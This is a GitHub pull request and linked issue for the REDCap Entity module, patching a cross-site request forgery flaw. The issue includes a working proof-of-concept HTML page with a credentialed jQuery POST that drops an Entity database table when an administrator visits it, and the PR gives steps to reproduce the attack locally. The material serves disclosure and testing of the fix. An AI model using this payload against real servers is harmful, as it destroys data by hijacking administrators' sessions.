### PR TITLE
adds and implements checkCsrfToken in SchemaManagerPage to eliminate CSRF vulnerability

### LINKED ISSUE #30: CSRF vulnerability
A Cross-Site Request Forgery (CSRF) vulnerability permits attackers to take advantage of a legitimate user’s session to perform unauthorized actions on behalf of that user. Effectively, anything the given user has permissions to do, can be done without their knowledge by the attacker. These attacks can be very difficult to trace, as the activity appears to come from the authorized user.

This vulnerability is usually exploited with a specially crafted link that the user is asked to visit but, in conjunction with a persistent XSS vulnerability, it is possible to eliminate the need for a user to take any action.This attack is made possible because the entity module does not verify the origin and authenticity of requests before processing them. All pages that process requests that update data are vulnerable.

If a currently logged-in administrator visits a web page with the following code, the Entity module will drop the project ownership table.

```html
<html>
    <head><title>Totally legit website</title></head>
    <body>
        <h1>You've been hacked</h1>
        <h3>Your Entity project ownership table has been dropped</h3>
        <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js"></script>
        <script>
            $.ajax(
                            { url:"REDCapServer/ExternalModules/?prefix=redcap_entity&page=manager%2Fschema",
                                            xhrFields: {
                                                            withCredentials: true
                                                        },
                                            type:"POST", 
                                            data: {"operation":"drop","entity_type":"project_ownership","redcap_csrf_token":"foo"}, 
                                            success: function(){}
                                        });
        </script>
    </body>
</html>
```

Please make use of REDCaps built in anti-CSRF token, `redcap_csrf_token`

### PR DESCRIPTION
**Pull request by ChemiKyle**
Closes #30 

To test:

## Setup
1. Spin up a server with redcap_entity and project_ownership (or any other module which uses entity) enabled
1. If needed, initialize the project_ownership table
   - Control Center > Entity DB Manager (bottom of left bar) > create db table
1. Save a local `html` file using the example page in the issue
   -  Change `REDCapServer` to your local host, e.g. (`http://localhost:11051/redcap_v10.5.1`)
   - Change the arg for `entity_type` from `project_ownership` if needed.
1. Use phpmyadmin to dump your `project_ownership` table if it's populated

## Testing
1. Open the local html file in a separate window
1. Reload your Entity DB Manager page and observe the table was dropped/unaffected

### CODE REVIEW

**Review by michael-bentz — APPROVED** [review]
Changes fix the issue. Tested pr with [redcap-entity-xss.html.zip](https://github.com/ctsit/redcap_entity/files/6207167/redcap-entity-xss.html.zip).
